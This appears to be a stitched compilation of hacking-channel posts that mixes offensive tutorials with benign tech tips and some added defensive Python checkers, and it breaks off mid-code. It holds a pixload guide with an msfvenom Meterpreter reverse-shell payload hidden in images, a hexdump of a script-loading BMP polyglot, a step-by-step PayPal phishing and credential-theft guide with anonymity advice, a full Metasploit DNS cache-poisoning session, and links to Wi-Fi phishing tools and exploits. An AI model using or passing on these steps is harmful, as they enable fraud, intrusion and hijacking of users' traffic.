-----
IMAGE PAYLOAD - HACK WINDOWS-ANDROID:
FEATURES:
Bypassing CSP using polyglot JPEGs
Hacking group using Polyglot images to hide malvertising attacks
Encoding Web Shells in PNG IDAT chunks
An XSS on Facebook via PNGs & Wonky Content Types
Revisiting XSS payloads in PNG IDAT chunks
INSTALLATION & RUN:
1) git clone https://github.com/chinarulezzz/pixload.git
2) cd pixload
3) If you want to inject a metasploit payload, try something like this:
msfvenom -p php/meterpreter_reverse_tcp \
LHOST=192.168.0.1 LPORT=31337 -f raw > payload.php
4) # Edit payload.php if needed.
5) ./png.pl -payload "$(cat payload.php)" -output payload.png
6) ./bmp.pl [-payload 'STRING'] -output payload.bmp
If the output file exists, then the payload will be injected into the
existing file. Else the new one will be created.
Example
7) ./bmp.pl -output payload.bmp
[>| BMP Payload Creator/Injector |<]
https://github.com/chinarulezzz/pixload
[>] Generating output file
[✔] File saved to: payload.bmp
[>] Injecting payload into payload.bmp
[✔] Payload was injected successfully
payload.bmp: PC bitmap, OS/2 1.x format, 1 x 1
00000000 42 4d 2f 2a 00 00 00 00 00 00 1a 00 00 00 0c 00 |BM/*............|
00000010 00 00 01 00 01 00 01 00 18 00 00 00 ff 00 2a 2f |..............*/|
00000020 3d 31 3b 3c 73 63 72 69 70 74 20 73 72 63 3d 2f |=1;<script src=/|
00000030 2f 6e 6a 69 2e 78 79 7a 3e 3c 2f 73 63 72 69 70 |/nji.xyz></scrip|
00000040 74 3e 3b |t>;|
00000043
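An added check, not part of pixload or the original post, that parses the BMP header shown in the hexdump above and reports what gives the polyglot away: the file-size field holding the bytes `/*`, a declared size that does not match the real size, and script-like text after the last pixel row. The sample polyglot is constructed here with the same layout as the hexdump; the script host `example.invalid` is a placeholder.

```python
"""Added example: detect BMP/JavaScript polyglots like the pixload output above.
Not part of pixload; both sample files are constructed here."""
import struct

SCRIPT_MARKERS = (b"<script", b"</script", b"<?php", b"eval(", b"*/")

def build_bmp_1x1(trailer=b"", size_field=None):
    """Minimal 1x1 24-bpp OS/2 BMP (12-byte BITMAPCOREHEADER).
    trailer is appended after the pixel row; size_field overrides the declared
    file size (4 bytes) so the '/*' trick from the hexdump can be reproduced."""
    core = struct.pack("<IHHHH", 12, 1, 1, 1, 24)      # header size, w, h, planes, bpp
    pixel_row = b"\x00\x00\xff\x00"                    # one BGR pixel + pad to 4 bytes
    body = core + pixel_row + trailer
    size = size_field if size_field is not None else struct.pack("<I", 14 + len(body))
    return b"BM" + size + b"\x00\x00\x00\x00" + struct.pack("<I", 14 + 12) + body

# Constructed sample mirroring the hexdump layout; the script host is a placeholder.
POLYGLOT_BMP = build_bmp_1x1(
    trailer=b"*/=1;<script src=//example.invalid></script>;",
    size_field=b"/*\x00\x00",      # size field doubles as a JavaScript comment opener
)
CLEAN_BMP = build_bmp_1x1()

def looks_like_script(blob):
    """Mostly printable text that contains a script marker."""
    printable = sum(1 for b in blob if 0x20 <= b < 0x7f or b in b"\r\n\t")
    return any(m in blob.lower() for m in SCRIPT_MARKERS) and printable / len(blob) > 0.9

def inspect_bmp(data):
    """Return a list of findings; an empty list means nothing suspicious."""
    findings = []
    if len(data) < 26 or data[:2] != b"BM":
        return ["not a BMP file"]
    declared_size, _, _, pixel_offset = struct.unpack_from("<IHHI", data, 2)
    dib_size = struct.unpack_from("<I", data, 14)[0]
    compression = 0
    if dib_size == 12:                                   # BITMAPCOREHEADER
        width, height, _, bpp = struct.unpack_from("<HHHH", data, 18)
    elif dib_size >= 40 and len(data) >= 54:             # BITMAPINFOHEADER and later
        width, height, _, bpp, compression = struct.unpack_from("<iiHHI", data, 18)
        height = abs(height)                             # negative height = top-down
    else:
        return [f"unknown DIB header size {dib_size}"]
    if data[2:4] == b"/*":
        findings.append("file-size field holds '/*' (JavaScript comment opener)")
    if declared_size != len(data):
        findings.append(f"declared size {declared_size} != actual size {len(data)}")
    if compression == 0:                                 # uncompressed: row length is known
        row_bytes = ((width * bpp + 31) // 32) * 4       # rows are padded to 4 bytes
        pixel_end = pixel_offset + row_bytes * height
        if pixel_end > len(data):
            findings.append("pixel data truncated")
        trailer = data[pixel_end:]
        if trailer:
            findings.append(f"{len(trailer)} trailing bytes after pixel data")
            if looks_like_script(trailer):
                findings.append("trailing bytes contain script-like text")
    return findings

if __name__ == "__main__":
    for name, blob in (("clean", CLEAN_BMP), ("polyglot", POLYGLOT_BMP)):
        print(name, inspect_bmp(blob) or ["no findings"])
```

Compressed (RLE) bitmaps are only checked for the size-field anomalies, since their pixel data length cannot be computed from the header alone.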
You're not allowed to copy our tutorials!
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
BYPASS MICROSOFT.COM RESTRICTION DOWNLOAD:
Windows 7 official
https://download.microsoft.com/download/5/1/9/5195A765-3A41-4A72-87D8-200D897CBE21/7601.24214.180801-1700.win7sp1_ldr_escrow_CLIENT_ULTIMATE_x64FRE_en-us.iso
Windows 10 official
x64 https://software-download.microsoft.com/pr/Win10_2004_English_x64.iso?t=b9c74c93-47e9-43b4-b84c-2960a16795b3&e=1602592122&h=9ee311b03b4b846bd513140d2ac7961e
x32 https://software-download.microsoft.com/pr/Win10_2004_English_x32.iso?t=b9c74c93-47e9-43b4-b84c-2960a16795b3&e=1602592122&h=328d4291008d28513bb3944e5a18af54
OFFICE 2019 PRO PLUS OFFICIAL:
https://officecdn.microsoft.com/db/492350F6-3A01-4F97-B9C0-C7C6DDF67D60/media/en-US/ProPlus2019Retail.img
If you need more dm any admin from @Undercode_Testing
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
-----
Do you know that your computer is infected with malware?
Symptom 1: Infected with ransomware
This is the most obvious symptom. The ransomware developer needs to clearly tell the target user that they are infected with the ransomware, otherwise how can they make money? If you are unfortunately the target user, then your computer should pop up a Warning box and tell you that your files are all encrypted and you need to pay a ransom for your data to an account before a certain deadline, otherwise you can say goodbye to your files directly.
Symptom 2: Browser redirection
When you use Google to search for the topic "My computer started to exhibit all kinds of strange behaviors", you clicked on a webpage that seemed to meet your search requirements, but the link opened to another webpage. Your first reaction is of course to go back to the Google search results just now, and then try to access other links. But it didn't help much, what happened just now happened again. You find that every link you click is redirected to other websites. If this happens, then congratulations, you are infected with malware.
Symptom 3: The homepage is tampered with
For example, you set your favorite sports news website as the homepage, but don't know why, every time you open your browser, the homepage of Yahoo.com will always pop up. And you also find that there are many new widget icons in the browser window, and these icons can't be deleted. Then please be careful, you are probably infected with malware.
Symptom 4: Pop-up window full of screen
The so-called pop-up window full of screen means that after you close this window, another window pops up again. And when you are not connected to the Internet, your system will continue to pop up various notification windows. Of course, there are many websites that will pop up various advertisements, and these websites will make you feel very disgusted. If all kinds of inexplicable pop-up messages always appear on your screen, then you may have been infected by malicious ads or spyware.
Symptom 5: The computer is running slower and slower
In fact, many factors can make a computer run slower and slower: you may be running too many programs, your hard drive may be short of space, or the machine may simply have too little memory. If none of those three applies to you and the computer is still very slow, then you have probably been infected.
Don't copy our tutorials
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
BEST LINK EXTRACTOR SOFTWARE (WIN/LINUX)
http://www.softpedia.com/get/Internet/Other-Internet-Related/Fahmy-Link-Manager.shtml
https://www.screamingfrog.co.uk/seo-spider/
https://xsite.informer.com/
http://www.nirsoft.net/utils/addrview.html
https://www.outwit.com/products/hub/
http://www.softpedia.com/get/Office-tools/Other-Office-Tools/Web-Link-Extractor-Linas.shtml
http://www.softpedia.com/get/Internet/E-mail/Mail-Utilities/Power-Email-Address-Extractor.shtml
https://github.com/maraf/LinkExtractor/releases
https://hackertarget.com/extract-links/
Don't copy our tutorials
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦How To Spam Paypal
First you need :
1) Mailist
2) Hosting ( Cpanel or Shell )
3) Mailler
4) A good Scam page
5) Email To Receive the Result Spam
6) A Letter
π¦I will explain all of this to you now.
To start spamming, you need to get a mail list (email list).
Where are you sent your spam) Understanding?
Scam Page means a planned website that looks like
Website of Paypal or website of a bank .... , this list of Fraud
You would need to upload it to the hosting scheme and submit it
To get the results from the mail list,
It's the spot you'll upload your skam to
Page to apply it, but now how do I get
This is not very complex, but you need a sum.
Time (you need to hack the website ...) to get it.
Helping you get started
mean the tools needed to send the spam
It is really easy to use it for the mailer, these tools
Enabling you to deliver a letter with the knowledge
You like it (thread title email from the sender ...)
And to encourage you to send spam to one million emails
I'll show you in the next thread with just one press,
Its The letter who you wil send it to the
mailist ,for example if you will spam Paypal account
you need a letter for paypal, this letter is programmed
and it like the original letter of paypal or bank company ..
( Hello , You need To confirm Your paypal Account .... )
you will use it and place it in the spam page
To get your result of spam in your email
That All Now i will explain you The Setup
1) First We need to Get a mailist ( i will show you in the next Post )
then we need a mailler and hosting and we start ,
2) You need to import and put the spam page in the Hosting area.
In order to receive the spam result, your own email in it, then
In the hosting area, you need to upload the mailler script
And now you need to change the sum of things in the letter.
To add your link to your uploaded spam list, you need to
Sending it
3) Here We start spam page and mailler uploaded
in the hosting letter modified with ower informatin ,
Now go to the mailler link and put the mailist and the letter
and the information of sender ( if you will spam paypal account )
you must pute service@paypal.com like email sender
the title of letter is you need to confirm your account .... ) and you start to send spam to the hacked mailist
now you need just to wait to receive the spam result
4) when they access to the scam page and write there information (
credit card ..... ) you will receive it in your own email
Please use all the tools while doing this. Absence of any one toll can either reveal your location or identity or either the paypal spamming will be useless to do and it wont work.
π¦Take care of all the security precautions like:-
RDP
VPN
PROXY
SOCKS5 / 911
etc. to keep yourself anonymous while doing all this.
use for learn only!!
-----
Kaminsky DNS Cache Poisoning Flaw Exploit for Domains:
This exploit targets a fairly ubiquitous flaw in DNS implementations
which allows the insertion of malicious DNS records into the cache of the
target nameserver. It caches a single malicious nameserver entry in the
target nameserver which replaces the legitimate nameservers for the
target domain. By causing the target nameserver to query for random
hostnames at the target domain, the attacker can spoof a response to the
target server including an answer for the query, an authority server
record, and an additional record for that server, causing the target
nameserver to insert the additional record into its cache. This insertion
completely replaces the original nameserver records for the target domain.
Example
=======
# /msf3/msfconsole
=[ msf v3.2-release
-- --=[ 298 exploits - 124 payloads
-- --=[ 18 encoders - 6 nops
=[ 73 aux
msf > use auxiliary/spoof/dns/bailiwicked_domain
msf auxiliary(bailiwicked_domain) > set RHOST A.B.C.D
RHOST => A.B.C.D
msf auxiliary(bailiwicked_domain) > set DOMAIN example.com
DOMAIN => example.com
msf auxiliary(bailiwicked_domain) > set NEWDNS dns01.metasploit.com
NEWDNS => dns01.metasploit.com
msf auxiliary(bailiwicked_domain) > set SRCPORT 0
SRCPORT => 0
msf auxiliary(bailiwicked_domain) > check
[*] Using the Metasploit service to verify exploitability...
[*] >> ADDRESS: A.B.C.D PORT: 50391
[*] >> ADDRESS: A.B.C.D PORT: 50391
[*] >> ADDRESS: A.B.C.D PORT: 50391
[*] >> ADDRESS: A.B.C.D PORT: 50391
[*] >> ADDRESS: A.B.C.D PORT: 50391
[*] FAIL: This server uses static source ports and is vulnerable to poisoning
msf auxiliary(bailiwicked_domain) > dig short -t ns example.com @A.B.C.D
[*] exec: dig short -t ns example.com @A.B.C.D
b.iana-servers.net.
a.iana-servers.net.
msf auxiliary(bailiwicked_domain) > run
[*] Switching to target port 50391 based on Metasploit service
[*] Targeting nameserver A.B.C.D for injection of example.com. nameservers as dns01.metasploit.com
[*] Querying recon nameserver for example.com.'s nameservers...
[*] Got an NS record: example.com. 171957 IN NS b.iana-servers.net.
[*] Querying recon nameserver for address of b.iana-servers.net....
[*] Got an A record: b.iana-servers.net. 171028 IN A 193.0.0.236
[*] Checking Authoritativeness: Querying 193.0.0.236 for example.com....
[*] b.iana-servers.net. is authoritative for example.com., adding to list of nameservers to spoof as
[*] Got an NS record: example.com. 171957 IN NS a.iana-servers.net.
[*] Querying recon nameserver for address of a.iana-servers.net....
[*] Got an A record: a.iana-servers.net. 171414 IN A 192.0.34.43
[*] Checking Authoritativeness: Querying 192.0.34.43 for example.com....
[*] a.iana-servers.net. is authoritative for example.com., adding to list of nameservers to spoof as
[*] Attempting to inject poison records for example.com.'s nameservers into A.B.C.D:50391...
[*] Sent 1000 queries and 20000 spoofed responses...
[*] Sent 2000 queries and 40000 spoofed responses...
[*] Sent 3000 queries and 60000 spoofed responses...
[*] Sent 4000 queries and 80000 spoofed responses...
[*] Sent 5000 queries and 100000 spoofed responses...
[*] Sent 6000 queries and 120000 spoofed responses...
[*] Sent 7000 queries and 140000 spoofed responses...
[*] Sent 8000 queries and 160000 spoofed responses...
[*] Sent 9000 queries and 180000 spoofed responses...
[*] Sent 10000 queries and 200000 spoofed responses...
[*] Poisoning successful after 13250 attempts: example.com. == dns01.metasploit.com
[*] Auxiliary module execution completed
msf auxiliary(bailiwicked_domain) > dig short -t ns example.com @A.B.C.D
[*] exec: dig short -t ns example.com @A.B.C.D
dns01.metasploit.com.
-----
How do you intercept traffic?
How to position and set up listening equipment?
1) I propose to consider the options for placing (connecting) sniffing equipment in a switched environment (interception of a Wi-Fi channel will be covered in the next article).
The most convenient way is to install a sniffer directly on the host we are interested in listening to.
2) However, some traffic that is very useful for research but not intended for the end device will be dropped by the network interface and never passed to the system for processing, which means we cannot capture it for further analysis. This includes broadcast traffic exchanged as part of the switch's operation.
3) For example, an ARP request is used by hosts to determine the MAC address that corresponds to a specific IP address.
4) Knowing the IP, we send an ARP request to all devices within the broadcast domain in order to learn the IP-to-MAC mapping.
5) However, only the target host is "interested" in receiving such a request; the other hosts, as mentioned above, discard the packet.
6) For clarity, using Cisco Packet Tracer, consider how a host with IP address 192.168.1.2 sends an ARP request to host 192.168.1.4.
Having first checked with arp -a that 192.168.1.2 has no ARP entries at all (they can be deleted with arp -d), we run ping against 192.168.1.4.
7) Since we do not know the MAC address, an ARP request is sent first. The request reaches the switch (Cisco 2960), which forwards it to all hosts connected to it. Host 192.168.1.3 then discards it, and 192.168.1.4 responds.
To capture all incoming traffic on 192.168.1.3, you need to enable promiscuous mode on its network interface. Tools such as Aircrack-ng, Wireshark and tcpdump let you do this.
When it is not possible to place a traffic analyzer on the target host, a hub can help.
In this case, the host under investigation and the traffic analyzer, both in the same switched network segment, are connected to the same hub.
As a result, all incoming and outgoing packets pass through every port of the hub.
For example, when Host1 sends packets to Host2, Hub0 forwards them both to Host2 (the host under investigation) and to the Sniffer host.
The packets dropped by the Sniffer in the picture are dropped because promiscuous mode is disabled on its network adapter.
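An added example, not from the original post, that builds the ARP request and reply from the 192.168.1.2 / 192.168.1.4 exchange above and applies the layer-2 filter a network card uses, showing which frames a sniffer on 192.168.1.3 sees with and without promiscuous mode. The MAC addresses are constructed, and the model is the hub case in which every frame reaches every card.

```python
"""Added example: which frames from the ARP exchange in the text a sniffer on a
third host sees, with and without promiscuous mode. Not from the original post;
the MAC addresses are constructed."""
import struct

BROADCAST = b"\xff" * 6
ETH_P_ARP = 0x0806
ARP_FMT = "!HHBBH6s4s6s4s"   # htype ptype hlen plen op sha spa tha tpa (28 bytes)

# Constructed MAC addresses for the three lab hosts from the text
MACS = {
    "192.168.1.2": bytes.fromhex("0200000000a2"),
    "192.168.1.3": bytes.fromhex("0200000000a3"),
    "192.168.1.4": bytes.fromhex("0200000000a4"),
}

def ip_bytes(ip):
    return bytes(int(octet) for octet in ip.split("."))

def ip_str(raw):
    return ".".join(str(b) for b in raw)

def build_arp(op, sender_ip, target_ip):
    """Ethernet frame carrying an ARP request (op=1) or reply (op=2).
    A request goes to the broadcast MAC; a reply is unicast to the requester."""
    sha = MACS[sender_ip]
    if op == 1:
        dst, tha = BROADCAST, b"\x00" * 6
    else:
        dst = tha = MACS[target_ip]
    arp = struct.pack(ARP_FMT, 1, 0x0800, 6, 4, op,
                      sha, ip_bytes(sender_ip), tha, ip_bytes(target_ip))
    return dst + sha + struct.pack("!H", ETH_P_ARP) + arp

def parse_frame(frame):
    dst, src = frame[:6], frame[6:12]
    ethertype = struct.unpack("!H", frame[12:14])[0]
    if ethertype != ETH_P_ARP:
        return None
    _, _, _, _, op, sha, spa, tha, tpa = struct.unpack(ARP_FMT, frame[14:42])
    return {"dst": dst, "src": src, "op": op, "spa": ip_str(spa), "tpa": ip_str(tpa)}

def nic_accepts(frame, own_mac, promiscuous=False):
    """The layer-2 filter a NIC applies before the OS ever sees a frame: only
    frames addressed to its own MAC or to broadcast are passed up, unless the
    interface is in promiscuous mode."""
    dst = frame[:6]
    return promiscuous or dst == own_mac or dst == BROADCAST

def capture(frames, host_ip, promiscuous=False):
    """(op, sender IP, target IP) of every frame a sniffer on host_ip would get.
    Models a hub (or a switch that flooded the frame): every frame reaches every
    NIC and only the NIC filter decides. On a switch the unicast reply would
    not even reach the third host's port."""
    seen = []
    for frame in frames:
        if nic_accepts(frame, MACS[host_ip], promiscuous):
            p = parse_frame(frame)
            seen.append((p["op"], p["spa"], p["tpa"]))
    return seen

def lab_exchange():
    """The exchange from the text: 192.168.1.2 asks who has 192.168.1.4, .4 replies."""
    return [build_arp(1, "192.168.1.2", "192.168.1.4"),
            build_arp(2, "192.168.1.4", "192.168.1.2")]

if __name__ == "__main__":
    frames = lab_exchange()
    for host in ("192.168.1.2", "192.168.1.3", "192.168.1.4"):
        print(host, "normal:", capture(frames, host),
              "promiscuous:", capture(frames, host, True))
```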
You're not allowed to copy our tutorials!
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
-----
WIFI CHANNEL SPEED?
1) Are you spending money for high-speed Internet and not getting what you expected? Was your WiFi network working fine and now you're suddenly stuck with slow WiFi data rates? Selecting the proper WiFi channel can significantly improve your WiFi coverage and performance.
2) In the 2.4 GHz band, 1, 6, and 11 are the only non-overlapping channels. Selecting one or more of these channels is an important part of setting up your network correctly. Currently, many wireless routers automatically select the channel for you upon initial setup, where depending on your wireless environment, it could lead to slow WiFi speeds and interference.
3) This guide describes the interference you're dealing with and takes you through the steps of selecting the right channel, so you understand why you should choose between channels 1, 6 and 11.
You're not allowed to copy our tutorials!
BY METAgeek
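An added example, not from MetaGeek or the original post, that derives why 1, 6 and 11 are the only non-overlapping 2.4 GHz channels (22 MHz wide channels on 5 MHz centres) and then picks the least-congested of the three from a scan of neighbouring access points. The scan result is constructed; the scoring weight (overlap fraction times signal strength) is an assumption of this example.

```python
"""Added example: why 1/6/11 are the non-overlapping 2.4 GHz channels, and a
simple pick of the least-congested one. Not from MetaGeek or the original post."""

CHANNEL_WIDTH_MHZ = 22                                   # 802.11b/g channel width
CENTER_MHZ = {ch: 2407 + 5 * ch for ch in range(1, 14)}  # channels 1-13, 5 MHz apart

def overlap_mhz(a, b):
    """Spectrum (MHz) that channels a and b share; 0 means they do not overlap."""
    return max(0, CHANNEL_WIDTH_MHZ - abs(CENTER_MHZ[a] - CENTER_MHZ[b]))

def non_overlapping_channels():
    """Greedy scan from channel 1 upward, keeping channels that share no
    spectrum with any already kept: yields [1, 6, 11] (25 MHz apart)."""
    kept = []
    for ch in sorted(CENTER_MHZ):
        if all(overlap_mhz(ch, k) == 0 for k in kept):
            kept.append(ch)
    return kept

def interference_score(candidate, neighbours):
    """Sum over neighbouring APs of (shared spectrum fraction) x (signal weight).
    neighbours: list of (channel, rssi_dbm); rssi + 100 maps -100..0 dBm to 0..100,
    so a strong AP on an overlapping channel costs more than a weak one."""
    score = 0.0
    for ch, rssi in neighbours:
        score += overlap_mhz(candidate, ch) / CHANNEL_WIDTH_MHZ * max(0, rssi + 100)
    return score

def best_channel(neighbours, candidates=(1, 6, 11)):
    """Lowest-interference candidate; ties go to the lower channel number."""
    return min(candidates, key=lambda ch: (interference_score(ch, neighbours), ch))

# Constructed scan result (channel, RSSI in dBm) of nearby access points
SCAN = [(1, -40), (3, -60), (11, -55), (6, -80)]

if __name__ == "__main__":
    print("non-overlapping:", non_overlapping_channels())
    for ch in (1, 6, 11):
        print(f"channel {ch:2d} interference score {interference_score(ch, SCAN):.1f}")
    print("best:", best_channel(SCAN))
```

Note that the strong AP on channel 3 bleeds into both 1 and 6, which is why a channel with a weak co-channel neighbour (6) beats an apparently empty but adjacent-overlapped one.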
β β β Uππ»βΊπ«Δπ¬πβ β β β
🦑Let's analyse together: critical vulnerabilities in the architecture of Intel, AMD and ARM processors :
How fortunate that critical vulnerabilities in the architecture of Intel, AMD and ARM processors were published while we were resting.
1) We did not get around to replacing the hardware, as recommended by US-CERT, since it turned out that updating the operating systems was enough.
Well, the manufacturers have had time to release the updates.
2) So, what is the bottom line at the moment?
There are two vulnerabilities: Meltdown ("Crash") and Spectre ("Ghost").
3) Meltdown lets an attacker break the barrier between applications and the operating system's internal (kernel) memory, which opens access to the data stored in the memory of the OS.
Detailed description: https://meltdownattack.com/meltdown.pdf.
4) Well, there are also exploits, for example: https://github.com/paboldin/meltdown-exploit.
5) Spectre breaks memory isolation between the applications themselves: roughly speaking, one service can reach into the memory of another.
Description: https://spectreattack.com/spectre.pdf. Exploiting this vulnerability is said to be harder, but exploits exist nonetheless: https://github.com/crozone/SpectrePoC, https://github.com/Eugnis/spectre-attack.
In general, a nightmare! Update, definitely!
Fears of a 30% performance loss have not been borne out in practice.
Microsoft:
Windows Server 2008 R2 Service Pack 1, Windows 7 Service Pack 1 - KB4056897 or KB4056894
Windows Server 2012 Standard - KB4056899 or KB4056896
Windows 8.1, Windows Server 2012 R2 Standard - KB4056898 or KB4056895
Windows 10 Enterprise - KB4056893
Windows 10 Version 1607, Windows Server 2016, Windows 10 Mobile - KB4056890
Windows 10 Version 1703 - KB4056891
Windows 10 version 1709 - KB4056892
🦑There may be problems installing the patch because of the antivirus.
A list of antiviruses that block the patch has been provided: BitDefender, Carbon Black, Cisco, CrowdStrike, Cylance, Cyren, Endgame, Fortinet, G-DATA, McAfee, Nyotron, Palo-Alto, SentinelOne, Sophos, Trend Micro, VIPRE, Webroot.
Modifying or creating the following registry key may help resolve the issue:
Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\QualityCompat
Value Name: cadca5fe-87d3-4b96-b7fb-a231484277cc
Type: REG_DWORD
Data: 0x00000000
This value is the one a compatible antivirus sets itself to signal that it can run with the patch; setting it by hand only tells Windows Update to offer the patch, it does not make an incompatible antivirus safe.
Briefly on performance: tests with the Windows 10 update showed a decrease in various performance parameters of 1-2%.
Details: http://www.guru3d.com/articles-pages/windows-vulnerability-cpu-meltdown-patch-benchmarked.html.
Linux:
Everything is simple, you need a kernel 4.14.12, 4.9.75 or 4.4.110. There are no updates for other branches, but they have a bunch of other unpatched vulnerabilities, so they are not recommended for use.
Apple:
Meltdown has been fixed in iOS 11.2, macOS 10.13.2, and tvOS 11.2. No update is required for watchOS.
Spectre, Apple claims, is only practically exploitable via JavaScript in a web browser, so they will keep Safari updated. That patch, as well as the OS-level Spectre patches, is still pending.
Google:
Android with the 2018-01-05 security patch level is protected.
Chrome 64 adds Spectre protection but is scheduled for release on January 23rd. Until then, if you wish, you can enable Site Isolation to protect against attacks.
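As an added check for the Linux case (not from the post), the following Python compares a `uname -r` string against the minimum kernel versions listed above and prefers the kernel's own sysfs verdict where the running kernel exposes one; the sysfs path and the version comparison are mine, and the sample version strings are constructed.

```python
"""Check a Linux kernel release string against the minimum patched versions
listed in the post (4.14.12, 4.9.75, 4.4.110).

Added example, not from the original post. The version comparison works
offline on plain strings; the sysfs lookup is the more reliable check on
kernels that expose it and is used first when present.
"""
import os
import re
from typing import Optional, Tuple

# Minimum upstream stable release per branch, as stated in the post.
MIN_PATCHED = {
    (4, 14): (4, 14, 12),
    (4, 9): (4, 9, 75),
    (4, 4): (4, 4, 110),
}

_VERSION_RE = re.compile(r"^(\d+)\.(\d+)(?:\.(\d+))?")

# Newer kernels (and distributions that backported the fix) publish their own verdict here.
SYSFS_MELTDOWN = "/sys/devices/system/cpu/vulnerabilities/meltdown"


def parse_kernel_version(release: str) -> Tuple[int, int, int]:
    """Turn a `uname -r` string such as '4.9.75-1-amd64' into (major, minor, patch)."""
    m = _VERSION_RE.match(release.strip())
    if not m:
        raise ValueError(f"unrecognised kernel release string: {release!r}")
    major, minor, patch = m.groups()
    return int(major), int(minor), int(patch or 0)


def meltdown_status_by_version(release: str) -> Optional[bool]:
    """True if the upstream version meets the post's minimum for its branch,
    False if it is below it, None if the branch is not one the post lists.

    Caveat: distribution kernels (Debian, RHEL, Ubuntu) backport the fix
    without bumping the upstream patch level, so False or None here means
    "not proven patched by version number", not "vulnerable"."""
    major, minor, patch = parse_kernel_version(release)
    needed = MIN_PATCHED.get((major, minor))
    if needed is None:
        return None
    return (major, minor, patch) >= needed


def meltdown_status_from_sysfs(path: str = SYSFS_MELTDOWN) -> Optional[str]:
    """Return the kernel's own verdict (e.g. 'Mitigation: PTI' or 'Vulnerable')
    when the running kernel exposes it, else None."""
    try:
        with open(path) as f:
            return f.read().strip()
    except OSError:
        return None


if __name__ == "__main__":
    verdict = meltdown_status_from_sysfs()
    if verdict is not None:
        print("kernel reports:", verdict)
    else:
        release = os.uname().release
        print(f"no sysfs entry; version check for {release}:",
              meltdown_status_by_version(release))
```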
β β β Uππ»βΊπ«Δπ¬πβ β β β
🦑Everything you need to know about Google Stadia :
#FastTips
1) On June 12, Google fixed one of the main shortcomings of the Stadia service: it is now available on any Android device, whether it is on the official support list or not. In addition, all OnePlus models from OnePlus 5 will support Stadia.
2) To use Stadia on a device without official support, you need to download the Stadia app, open the "Experiments" tab and click "Play". The service should work without problems.
3) Last year Google announced the Stream project. This was a limited test built around Assassin's Creed Odyssey. After a short period of testing in January, the project ended and Google said nothing about its future plans to stream games. Stadia was announced at GDC 2019.
4) The idea of streaming is far from new. However, Google's service may turn out to be one of the most ambitious.
Google Stadia is a game streaming service to any user's device. It can be a TV, smartphone, laptop, tablet. In any case, you will be able to access the most advanced games.
How is this possible? Google servers process the image of the games and broadcast it. The user only needs a device with a screen. This gives everyone access to high quality games with high system requirements. Including those who cannot afford to buy an expensive gaming computer or console.
🦑Supported platforms
The cloud service works with a Chromecast Ultra device when connected to a TV. Chrome browser is supported on computers, laptops and tablets, including Chrome OS. Among smartphones, Google Pixel 2, Pixel 3, Pixel 3a and Pixel 4 are supported.
In February, support for the following smartphones appeared:
Samsung Galaxy S8
Samsung Galaxy S8 Plus
Samsung Galaxy S8 Active
Samsung Galaxy Note 8
Samsung Galaxy S9
Samsung Galaxy S9 Plus
..../.......
5) in June it was announced that all Android smartphones will be able to work with Stadia. Even those that are not included in the above list. You can install the Stadia application on them, open the "Experiments" tab and click "Play".
6) Since this is a cloud service, all the heavy processing is done by other people's computers remotely. You can work with a smartphone, tablet or even a weak computer, the quality will be equally high. Users of the service will receive the computing power of a custom AMD 2.7 GHz x86 processor, 16 GB of RAM, data transfer rates up to 484 GB / s and a GPU with a capacity of 10.7 teraflops.
This makes Google's platform more powerful than any game console on the market. In addition, Google will be responsible for updates and users will not have to do anything.
Of course, the quality of the games will depend on your internet connection. Playing on Chromecast Ultra, you can get 4K support with HDR and 5.1 surround sound if you have a TV, sound system, and fast enough internet to support it all.
🦑Can I try Stadia for free?
Yes. Google has announced a two-month free trial for Stadia Pro. Any owner of supported devices can play several games on the service for free. They can buy additional games to play and stream. After the trial period ends, you can renew your Stadia Pro subscription for $ 9.99 per month. You can unsubscribe at any time before the end of the trial period.
β β β Uππ»βΊπ«Δπ¬πβ β β β
🦑WIFI HACKING & TUTORIALS :)
https://www.youtube.com/watch?v=63qZzmGPFLI
https://github.com/FluxionNetwork/fluxion
https://github.com/wifiphisher/wifiphisher
(tutorial https://wifiphisher.org/)
https://www.aircrack-ng.org/
https://www.pcmag.com/how-to/how-to-hack-wi-fi-passwords
https://www.guru99.com/how-to-hack-wireless-networks.html
β β β Uππ»βΊπ«Δπ¬πβ β β β
🦑LINUX EXPLOITS :
Highly probable - assessed kernel is most probably affected and there's a very good chance that PoC exploit will work out of the box without any major modifications.
Probable - it's possible that exploit will work but most likely customization of PoC exploit will be needed to suit your target.
Less probable - additional manual analysis is needed to verify if kernel is affected.
Unprobable - highly unlikely that kernel is affected (exploit is not displayed in the tool's output)
INSTALLISATION & RUN :
1) wget https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh -O les.sh
2) Details about LES usage and inner workings:
3) https://mzet-.github.io/2019/05/10/les-paper.html
Additional resources for the LES:
https://github.com/mzet-/les-res
4) Purpose
The LES tool is designed to assist in detecting security deficiencies for a given Linux kernel / Linux-based machine. It provides the following functionality:
Assessing kernel exposure to publicly known exploits
The tool assesses (using the heuristic methods discussed in detail in the paper linked above) the exposure of the given kernel to every publicly known Linux kernel exploit. Example of tool output:
5) $ ./linux-exploit-suggester.sh
...
[+] [CVE-2017-16995] eBPF_verifier
   Details: https://ricklarabee.blogspot.com/2018/07/ebpf-and-analysis-of-get-rekt-linux.html
   Exposure: highly probable
   Tags: debian=9.0{kernel:4.9.0-3-amd64},fedora=25|26|27,[ ubuntu=14.04 ]{kernel:4.4.0-89-generic},ubuntu=(16.04|17.04){kernel:4.(8|10).0-(19|28|45)-generic}
   Download URL: https://www.exploit-db.com/download/45010
   Comments: CONFIG_BPF_SYSCALL needs to be set && kernel.unprivileged_bpf_disabled != 1
https://github.com/mzet-/linux-exploit-suggester
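The useful defensive step after running LES is triage: order the entries by the exposure scale above and check whether a hardening sysctl named in an entry's Comments is already set. The Python below is an added example, not part of LES; SAMPLE_OUTPUT reproduces the entry shown above plus one constructed entry with a placeholder CVE id, and the Comments-parsing regex is my own heuristic for the "kernel.x != N" form used there.

```python
"""Triage linux-exploit-suggester output: parse its entries, order them by the
exposure levels the tool uses, and test any sysctl precondition stated in an
entry's Comments against the host's settings.

Added example, not part of LES itself. SAMPLE_OUTPUT reproduces the entry
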